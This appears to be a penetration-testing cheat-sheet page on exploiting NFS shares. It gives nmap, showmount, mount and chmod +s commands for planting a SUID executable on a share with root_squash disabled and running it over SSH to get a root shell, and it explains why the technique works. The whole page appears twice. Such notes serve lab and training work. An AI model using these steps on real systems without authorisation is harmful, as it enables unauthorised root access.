Exploiting NFS

Requirements
- nfs-common package should be installed
Steps

# Nmap scan to find NFS port, be careful as this scan is NOISY and might take a long time  
nmap -T5 -vv -p- IP 

# List NFS Shares 
/sbin/showmount -e IP 

# Mount NFS Share 
sudo mount -t nfs IP:share /tmp/mount -nolock

# Set root SUID for the executable file 
chmod +s [filename]

# Make sure file is executable 
chmod +x [filename]

# SSH into target machine and run executable with -p so permissions persist and you get root shell 
./[filename] -p

What is root_squash?
- By default, Root Squashing is enabled on NFS shares, this prevents anyone connecting to the NFS share form having root access to the NFS volume
- Remote root users are assigned a user "nfsnobody" when connected, with least local privileges
- If it is turned off, it can allow the creation of SUID bit files, allowing a remote user root access to the connected system
What are files with the SUID bit set?
- The file or files can be run with the permission of the file(s) owner/group, in some cases as the super-user
- This can be leveraged to get a shell with these super-user privileges
Method
- You can upload files to the NFS share, setting the permissions of the file
- Then log in through SSH and execute the file to gain a root shell

PreviousExploiting FTP NextExploiting SMTP

Last updated 11 months ago

Exploiting NFS

Requirements
- nfs-common package should be installed
Steps

# Nmap scan to find NFS port, be careful as this scan is NOISY and might take a long time  
nmap -T5 -vv -p- IP 

# List NFS Shares 
/sbin/showmount -e IP 

# Mount NFS Share 
sudo mount -t nfs IP:share /tmp/mount -nolock

# Set root SUID for the executable file 
chmod +s [filename]

# Make sure file is executable 
chmod +x [filename]

# SSH into target machine and run executable with -p so permissions persist and you get root shell 
./[filename] -p

What is root_squash?
- By default, Root Squashing is enabled on NFS shares, this prevents anyone connecting to the NFS share form having root access to the NFS volume
- Remote root users are assigned a user "nfsnobody" when connected, with least local privileges
- If it is turned off, it can allow the creation of SUID bit files, allowing a remote user root access to the connected system
What are files with the SUID bit set?
- The file or files can be run with the permission of the file(s) owner/group, in some cases as the super-user
- This can be leveraged to get a shell with these super-user privileges
Method
- You can upload files to the NFS share, setting the permissions of the file
- Then log in through SSH and execute the file to gain a root shell

PreviousExploiting FTP NextExploiting SMTP

Last updated 11 months ago